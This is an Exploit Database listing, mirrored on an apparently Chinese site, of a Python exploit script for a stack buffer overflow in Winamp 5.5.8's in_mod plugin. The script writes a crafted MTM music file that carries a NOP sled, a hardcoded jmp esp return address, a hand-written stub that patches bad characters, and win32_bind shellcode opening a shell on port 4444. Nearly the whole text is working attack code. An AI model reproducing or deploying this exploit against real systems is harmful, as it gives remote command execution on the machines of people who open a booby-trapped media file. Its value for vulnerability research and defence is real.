Winamp 5.5.8 (in_mod plugin) – Local Stack Overflow

• Exploit Database
• 103 阅读

• 作者： Mighty-D
  日期： 2010-10-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15287/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209

  #!/usr/bin/python # Pwn And Beans by Mighty-D presents: # Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow # WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet # Bug found by http://www.exploit-db.com/exploits/15248/ # POC by fdisk # Exploit by Mighty-D # Special thanks to: # fdisk: Who wrote the skeleton of what you are looking at # Ryujin: For pointing the bug # Muts: For bringing the pain and the omelet ideas that weren't used # dijital1 and All the EDB-Team # The guys from UdeA, Ryepes, HerreraDavid, GomezRam7 # Just one comment: Stupid badchars!!!!!!!   header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E" header += "\x04\x0C" * 16   nopsled = "\x90" * 58207   eip = "\xED\x1E\x95\x7C" # jmp esp WIN XP SPANISH change at will   patch_shellcode = "\x90" * 16 patch_shellcode += "\x90\x33\xDB" # Set EBX to zero patch_shellcode += "\x54\x5B" # PUSH ESP ; POP EBXGET THE RELATIVE POSITION patch_shellcode += "\x81\xEB\x95\xFC\xFF\xFF" # make EBX point to our shell patch_shellcode += "\x43"*13 # Move EBX as close as we can to the first badchar patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*1 # Move EBX to the first badchar patch_shellcode += "\x80\x2B\x20" # Set it to 13 -verified patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 05- verified patch_shellcode += "\x43"*16 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xEC" # Set it to 21 - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x7C" # Set it to 8e - verified patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*30 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 05 - verified patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*11 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x42" # Set it to CB - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x78" # Set it to 92 - verified patch_shellcode += "\x90"*26 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*18 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 04 - verified patch_shellcode += "\x90"*16 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*15 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 02 - verified patch_shellcode += "\x43"*8 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x21" # Set it to EC - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x7C" # Set it to 8e - verified patch_shellcode += "\x90"*14 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*18 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x49" # Set it to c1 - verified patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to EA, but we need F6 patch_shellcode += "\x80\x2B\xF4" # Set it to F6 - verified patch_shellcode += "\x43"*9 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 11 - verified patch_shellcode += "\x43"*10 # Move EBX to the next badchar patch_shellcode += "\x90"*3 # Nop sled to avoid damage from CrLf patch_shellcode += "\x80\x2B\xCD" # Set it to 3D - verified patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 07 - verified patch_shellcode += "\x43"*11 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x43"*8 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*11 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x8E" # Set it to 7F - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xDF" # Set it to 2B - verified patch_shellcode += "\x43"*8 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x1E" # Set it to EC - verified patch_shellcode += "\x90"*11 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*12 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 8 - verified patch_shellcode += "\x90"*28 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*29 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xa7" # Set it to 66 - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf patch_shellcode += "\x80\x2B\xb8" # Set it to 52 - verified patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*17 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 3 - verified patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified patch_shellcode += "\x90"*12 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*2 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 3 - verified patch_shellcode += "\x43"*7 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 2 - verified patch_shellcode += "\x90"*10 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*6 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 13 - verified patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to5 - verified patch_shellcode += "\x43"*3 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x1B" # Set it to F2 - verified patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xF4" # Set it to 16 - verified patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 10 - verified patch_shellcode += "\x43"*4 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 10 - verified patch_shellcode += "\x90"*20 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*17 # Move EBX to the next badchar patch_shellcode += "\x90"*28 # Lazy nopsled patch_shellcode += "\x43"*16 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x26" # Set it to E7 - verified patch_shellcode += "\x90"*18 # Nop sled to avoid damage from CrLf patch_shellcode += "\x43"*1 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\xBE" # Set it to 4C - verified patch_shellcode += "\x43"*7 # Move EBX to the next badchar patch_shellcode += "\x80\x2B\x20" # Set it to 5 - verified patch_shellcode += "\x90"*(66)   # win32_bind -EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub shellcode= "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" shellcode += "\x33" # Should be 13 shellcode += "\xa9\x41" shellcode += "\x25" # should be 05 shellcode += "\x3f\x83\xeb\xfc\xe2\xf4\x55\x2b\xee\x72\x41\xb8\xfa\xc0" shellcode += "\x56" # \x21\x8e Ripped shellcode += "\x53\x8d\x65\x8e\x7a\x95\xca\x79\x3a\xd1\x40\xea\xb4" shellcode += "\xe6\x59\x8e\x60\x89\x40\xee\x76\x22\x75\x8e\x3e\x47\x70\xc5\xa6" shellcode += "\x25" # should be 05 shellcode += "\xc5\xc5\x4b\xae\x80\xcf\x32\xa8\x83\xee" # \xcb\x92 shellcode += "\x15\x21\x17" shellcode += "\xdc\xa4\x8e\x60\x8d\x40\xee\x59\x22\x4d\x4e\xb4\xf6\x5d" shellcode += "\x24" #Should be 04 shellcode += "\xd4\xaa\x6d\x8e\xb6\xc5\x65\x19\x5e\x6a\x70\xde\x5b\x22" shellcode += "\x22" # Should be 02 shellcode += "\x35\xb4\xe9\x4d\x8e\x4f\xb5" # \xec\8e Ripped shellcode += "\x7f\xa1\x1f\x6d\xb1\xe7\x4f\xe9\x6f" shellcode += "\x56\x97\x63\x6c\xcf\x29\x36\x0d" # \xc1 Ripped shellcode += "\x36\x76\x0d" # \xf6 ripped shellcode += "\x15\xfa\xef" shellcode += "\xc1\x8a\xe8\xc3\x92" shellcode += "\x31" # Should be 11 shellcode += "\xfa\xe9\xf6\xc8\xe0\x59\x28\xac\x0d" # \x3d ripped shellcode += "\xfc\x2b" shellcode += "\x27" # should be 07 shellcode += "\xc0\x79\x29\xdc\x36\x5c\xec\x52\xc0\x7f" shellcode += "\x32" # should be 12 shellcode += "\x56\x6c\xfa" shellcode += "\x32" # should be 12 shellcode += "\x46\x6c\xea" shellcode += "\x32" # should be 12 shellcode += "\xfa\xef\xcf\x29\x14\x63\xcf" shellcode += "\x32" #should be 12 shellcode += "\x8c\xde" shellcode += "\x3c\x29\xa1\x25\xd9\x86\x52\xC0" # \x7f\x2b Ripped shellcode += "\x15\x6e\xfc\xbe\xd5\x57" shellcode += "\x0d" # \xec Ripped shellcode += "\x2b\xd6\xfe\xbe\xd3\x6c\xfc\xbe\xd5\x57\x4c" shellcode += "\x28" # should be 08 shellcode += "\x83\x76" shellcode += "\xfe\xbe\xd3\x6f\xfd\x15\x50\xc0\x79\xd2\x6d\xd8\xd0\x87\x7c\x68" shellcode += "\x56\x97\x50\xc0\x79\x27\x6f\x5b\xcf\x29" # \x66\x52 Ripped shellcode += "\x20\xa4\x6f\x6f" shellcode += "\xf0\x68\xc9\xb6\x4e\x2b\x41\xb6\x4b\x70\xc5\xcc" shellcode += "\x23" # shoudl be 03 shellcode += "\xbf\x47" shellcode += "\x32" #Should be 12 shellcode += "\x57" shellcode += "\x23" # Should be 03 shellcode += "\x29\xac\x24\x3b\x3d\x94" shellcode += "\x22"# should be 02 shellcode += "\xea\x6d\x4d\x57\xf2" shellcode += "\x33" # should be 13 shellcode += "\xc0\xdc" shellcode += "\x25" # should be 5 shellcode += "\xfa\xe9" # \xf2\x16 Ripped shellcode += "\x57\x6e\xf8" shellcode += "\x30" #should be 10 shellcode += "\x6f\x3e\xf8" shellcode += "\x30" # Should be 10 shellcode += "\x50\x6e" shellcode += "\x56\x91\x6d\x92\x70\x44\xcb\x6c\x56\x97\x6f\xc0\x56\x76\xfa\xef" shellcode += "\x22\x16\xf9\xbc\x6d\x25\xfa\xe9\xfb\xbe\xd5" shellcode += "\x57\xd7\x99" #\xe7\x4c Ripped shellcode += "\xfa\xbe\xd3\xc0\x79\x41" shellcode += "\x25" # should be 05 shellcode += "\x3f"   payload = header + nopsled + eip + patch_shellcode + shellcode   try: file = open("crash.mtm", "w") file.write(payload) file.close() print "MTM file generated successfuly" except: print "Cannot create file"